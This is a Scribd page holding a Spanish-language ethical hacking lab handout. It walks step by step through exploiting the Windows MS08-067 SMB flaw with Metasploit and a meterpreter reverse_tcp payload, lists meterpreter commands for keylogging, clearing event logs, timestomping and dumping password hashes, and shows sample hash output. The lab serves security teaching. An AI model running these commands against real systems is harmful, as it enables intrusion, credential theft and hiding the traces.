Scribd Logo
Upload

Welcome to Scribd!

  • 12 views

    Lab Met As Ploit

    Uploaded by

    sophy philo
    The document provides instructions for using Metasploit to exploit the MS08_067 vulnerability on Windows systems. It describes running msfconsole to access exploits, using the windows/smb/ms08_067_netapi exploit against a target system, setting the payload, local host, and displaying options. Once exploited, it provides examples of meterpreter commands for accessing files, networking information, system details and dumping password hashes from the remote system.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    Lab Met As Ploit

    Uploaded by

    sophy philo
    12 views6 pages
    The document provides instructions for using Metasploit to exploit the MS08_067 vulnerability on Windows systems. It describes running msfconsole to access exploits, using the windows/smb/ms08_067_netapi exploit against a target system, setting the payload, local host, and displaying options. Once exploited, it provides examples of meterpreter commands for accessing files, networking information, system details and dumping password hashes from the remote system.

    Original Description:

    ethical hacking

    Original Title

    Lab Met as Ploit

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document provides instructions for using Metasploit to exploit the MS08_067 vulnerability on Windows systems. It describes running msfconsole to access exploits, using the windows/smb/ms08_067_netapi exploit against a target system, setting the payload, local host, and displaying options. Once exploited, it provides examples of meterpreter commands for accessing files, networking information, system details and dumping password hashes from the remote system.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    12 views6 pages

    Lab Met As Ploit

    Uploaded by

    sophy philo
    The document provides instructions for using Metasploit to exploit the MS08_067 vulnerability on Windows systems. It describes running msfconsole to access exploits, using the windows/smb/ms08_067_netapi exploit against a target system, setting the payload, local host, and displaying options. Once exploited, it provides examples of meterpreter commands for accessing files, networking information, system details and dumping password hashes from the remote system.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 6

     Se puede encontrar una guía completa en :

    https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-
    Development-Environment

     Para este ejercicio, utilizar la versión instalada en Kali Linux

    OPENS-SEC ETHICAL HACKER


    MODO CONSOLA
     Deberá de ejecutarla en modo consola : ./msfconsole

     Utilizar los comandos siguientes para conocer el paquete:

     msf > show exploits

     Objetivo: MS Windows

     La actividad a realizar es con el exploit: windows/smb/ms08_067_netapi. Para ello


    debe ejecutar los comandos siguientes:

     ./msfconsole
     msf > show exploits
     msf > use windows/smb/ms08_067_netapi
     msf exploit(ms08_067_netapi) > show options
     msf exploit(ms08_067_netapi) > set rhost direccion_IP_victima
     msf exploit(ms08_067_netapi) > show payloads

     Una vez que se muestren los PAYLOAD´s, seleccionar el payload meterpreter

     msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

     Luego seleccionar al atacante:

     msf exploit(ms08_067_netapi) > set lhost direccion_IP_atacante

     Para ver que todos los valores fueron puestos correctamente:

     msf exploit(ms08_067_netapi) > set

     Por último, ejecutar el exploit:

     msf exploit(ms08_067_netapi) > exploit

    OPENS-SEC ETHICAL HACKER


    METERPRETER
    meterpreter > help

    Core Commands

    =============

    Command Description

    ------- -----------

    ? Help menu

    background Backgrounds the current session

    channel Displays information about active channels

    close Closes a channel

    exit Terminate the meterpreter session

    help Help menu

    interact Interacts with a channel

    irb Drop into irb scripting mode

    migrate Migrate the server to another process

    quit Terminate the meterpreter session

    read Reads data from a channel

    run Executes a meterpreter script

    use Load a one or more meterpreter extensions

    write Writes data to a channel

    Stdapi: File system Commands

    ============================

    Command Description

    ------- -----------

    cat Read the contents of a file to the screen

    OPENS-SEC ETHICAL HACKER


    cd Change directory

    del Delete the specified file

    download Download a file or directory

    edit Edit a file

    getlwd Print local working directory

    getwd Print working directory

    lcd Change local working directory

    lpwd Print local working directory

    ls List files

    mkdir Make directory

    pwd Print working directory

    rm Delete the specified file

    rmdir Remove directory

    upload Upload a file or directory

    Stdapi: Networking Commands

    ===========================

    Command Description

    ------- -----------

    ipconfig Display interfaces

    portfwd Forward a local port to a remote service

    route View and modify the routing table

    Stdapi: System Commands

    =======================

    Command Description

    OPENS-SEC ETHICAL HACKER


    ------- -----------

    clearev Clear the event log

    execute Execute a command

    getpid Get the current process identifier

    getuid Get the user that the server is running as

    kill Terminate a process

    ps List running processes

    reboot Reboots the remote computer

    reg Modify and interact with the remote registry

    rev2self Calls RevertToSelf() on the remote machine

    shell Drop into a system command shell

    shutdown Shuts down the remote computer

    sysinfo Gets information about the remote system, such as OS

    Stdapi: User interface Commands

    ===============================

    Command Description

    ------- -----------

    enumdesktops List all accessible desktops and window stations

    idletime Returns the number of seconds the remote user has been idle

    keyscan_dump Dump they keystroke buffer

    keyscan_start Start capturing keystrokes

    keyscan_stop Stop capturing keystrokes

    setdesktop Move to a different workstation and desktop

    uictl Control some of the user interface components

    OPENS-SEC ETHICAL HACKER


    Priv: Password database Commands

    ================================

    Command Description

    ------- -----------

    hashdump Dumps the contents of the SAM database

    Priv: Timestomp Commands

    ========================

    Command Description

    ------- -----------

    timestomp Manipulate file MACE attributes

    EJEMPLO :

    meterpreter > hashdump

    Administrador:500:fd339fb80b44d34564c3113b4a1a5e3a0:14348077370769d30e68ce81549849c0:::

    Asistente de ayudaM:1000:9a379af252bf73ee05617bba465241fb:b2c7cce470a5f7f5422984b8cf3d5292:::

    Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    SUPPORT_388945a0?:1002:aad3b435b51404eeaad3b435b51404ee:6e88c8b50b58f1981cec8b033c631ef4:::

    OPENS-SEC ETHICAL HACKER

    You might also like